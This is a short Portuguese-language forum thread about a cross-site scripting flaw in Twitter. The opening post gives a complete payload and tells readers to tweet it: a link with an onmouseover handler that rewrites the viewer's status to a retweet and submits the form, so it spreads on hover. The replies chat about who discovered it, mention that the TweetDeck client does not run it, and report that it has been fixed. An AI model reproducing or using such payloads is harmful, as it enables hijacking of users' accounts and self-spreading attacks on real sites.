Falha no twtter permite execucoes de scripts xss:
twitta esse codigo:
http://t.co/@ (http://t.co/@)"onmouseover="document.getElementById('status').value='RT jessyi7′;$('.status-update-form').submit();"class="modal-overlay"/
apos o usuario passa o mouse em cima do codigo ele e executado ..
Prevencao:
Na utulizacao de um cliente tipo tweetdeck, o script nao e executado...
Puts, é engano meu ou começou a ser descoberto os bugs do twitter?
voce quem descobriu esse xss, zombie ?
agora é tenso ficar usando o tweetdeck...
valeu o toque, []'s
fala fpois0n bele..
nao nao.. nao fui eu que descobri a falha... so tava no twitter na hora do teste^^
faz tempo que parrei com estudos e "testes"^^ da area. Mas estou pretendendo voltar!
E sobre o twtter.. cada dia sai um exploit novo pra ele.. mas o pessoal la ta antenado!!
JA ARRUMARAM PARA ESSA FUL..
Incrivel como o twitter consegue sofrer meses uma falha tão idiota como XSS! ;)
Fala Reeves master servers ... haushsauhausah
sao "tudo" uns cabaco pelo jeito...